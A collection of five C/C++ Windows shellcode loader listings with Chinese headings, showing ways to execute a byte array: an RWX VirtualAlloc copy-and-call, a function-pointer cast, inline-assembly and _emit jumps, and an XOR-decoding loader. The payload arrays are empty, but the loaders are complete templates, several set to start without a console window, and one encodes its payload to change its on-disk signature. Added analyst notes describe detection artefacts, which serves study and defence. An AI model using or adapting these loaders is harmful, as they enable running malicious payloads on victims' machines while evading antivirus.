C/C++
利用动态申请内存
#include <windows.h>
#include <stdio.h>
/* Function-pointer type used to call the copied buffer: takes no arguments,
   returns nothing, __stdcall calling convention. */
typedef void (_stdcall *CODE)();
/* Linker directive: link for the GUI ("windows") subsystem while keeping the
   CRT entry point that calls main(). A GUI-subsystem image starts without a
   console window. */
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
/* Payload bytes. The page leaves the literal empty, so sizeof(shellcode) is 1
   (only the terminating NUL). */
unsigned char shellcode[] ="";
/*
 * Copies the global `shellcode` array into a freshly allocated
 * read/write/execute region and calls it through the CODE pointer type.
 * Returns without doing anything if the allocation fails.
 *
 * Analyst note: the sequence below (private PAGE_EXECUTE_READWRITE
 * allocation, a write into it, then an indirect call into the same region)
 * leaves executable memory that is not backed by any image file on disk.
 * That is the property memory scanners and endpoint telemetry look for
 * with this loader pattern.
 */
void main()
{
    /* Reserve and commit in one call; the region is RWX from the start. */
    PVOID region = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (region != NULL)
    {
        /* sizeof covers the whole array, including the trailing NUL byte. */
        memcpy(region, shellcode, sizeof(shellcode));

        /* Treat the start of the region as a __stdcall void(void) function. */
        ((CODE)region)();
    }
}
强制类型转换成函数指针
#include <windows.h>
#include <stdio.h>
/* Linker directive: GUI ("windows") subsystem with the CRT entry point that
   calls main(); the process starts without a console window. */
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
/* Payload bytes (left empty on the page). This is an ordinary initialized
   global; nothing in this listing changes the protection of the memory it
   occupies. */
unsigned char shellcode[] ="";
/*
 * Calls the global `shellcode` array in place by casting its address to a
 * WINAPI void(void) function pointer. No memory is allocated or copied.
 *
 * Analyst note: the array is a writable global and this listing does not
 * mark its storage executable. Where DEP/NX is enforced for the process,
 * the call is expected to fault with an access violation instead of running
 * the bytes.
 */
void main()
{
    typedef void (WINAPI *entry_fn)(void);

    /* &shellcode has the same address as the first byte of the array. */
    entry_fn entry = (entry_fn)&shellcode;
    entry();
}
内联汇编调用shellcode
#include <windows.h>
#include <stdio.h>
/* Linker directive: give the .data section Read, Write and Execute
   attributes. Initialized globals such as the array below are normally
   placed in .data, so they become executable in place.
   Analyst note: the flag is recorded in the PE section header, so an
   executable+writable .data section is visible to static inspection of the
   file without running it. */
#pragma comment(linker, "/section:.data,RWE")
/* Payload bytes (left empty on the page). */
unsigned char shellcode[] ="";
/*
 * Transfers control to the global `shellcode` array using MSVC inline
 * assembly. The __asm block syntax and the 32-bit eax register mean this
 * listing targets 32-bit x86 builds.
 */
void main()
{
__asm
{
// Load the address of the array into eax.
mov eax, offset shellcode
// Jump (not call): no return address is pushed, so execution does not come
// back to main() unless the target arranges it.
jmp eax
}
}
使用 _emit 伪指令
#include <windows.h>
#include <stdio.h>
/* Linker directive: give the .data section Read, Write and Execute
   attributes, so the global array below is executable where it sits.
   Analyst note: an executable+writable .data section is recorded in the PE
   section header and can be seen by static inspection of the file. */
#pragma comment(linker, "/section:.data,RWE")
/* Payload bytes (left empty on the page). */
unsigned char shellcode[] ="";
/*
 * Same control transfer as a `jmp eax` to the global `shellcode` array, but
 * the jump is written as raw opcode bytes with the MSVC _emit pseudo-
 * instruction instead of a mnemonic. 32-bit x86 inline assembly.
 */
void main()
{
__asm
{
// Load the address of the array into eax.
mov eax, offset shellcode
// 0xFF 0xE0 is the machine encoding of `jmp eax`; _emit places each byte
// directly in the instruction stream.
_emit 0xFF
_emit 0xE0
}
}
XOR 加密(运行时用同一密钥循环异或还原)
/*
Author: Arno0x0x, Twitter: @Arno0x0x
*/
#include "stdafx.h"
#include <windows.h>
#include <iostream>
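// Decodes an XOR-encoded buffer with a repeating key, copies the result into
// a read/write/execute allocation and calls it.
//
// Returns 0 after the call returns, or 1 if the allocation fails.
//
// Analyst note: the key is stored in cleartext beside the encoded bytes, so
// the XOR step only changes the byte pattern of the file on disk. At run time
// the decoded bytes exist both in the stack array and in the RWX region,
// which is private executable memory not backed by an image file.
int main(int argc, char **argv) {
    // Encrypted shellcode and cipher key obtained from shellcode_encoder.py
    char encryptedShellcode[] = "";
    char key[] = "uknowsec";
    char cipherType[] = "xor";  // kept from the original; not read in this function

    // Stack buffer that receives the decoded bytes (same size as the input,
    // including its trailing NUL).
    char shellcode[sizeof encryptedShellcode];

    // The decoding key must be the one used for encoding. The key's own NUL
    // terminator is excluded, so the index cycles over the visible characters.
    const size_t keyLen = sizeof key - 1;
    for (size_t i = 0; i < sizeof encryptedShellcode; i++) {
        shellcode[i] = encryptedShellcode[i] ^ key[i % keyLen];
    }

    // Allocate memory with read/write/execute rights.
    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        // The original passed the unchecked result straight to memcpy, which
        // dereferences NULL when the allocation fails.
        return 1;
    }

    // Copy the decoded bytes into the region and call it as void(void).
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();
    return 0;
}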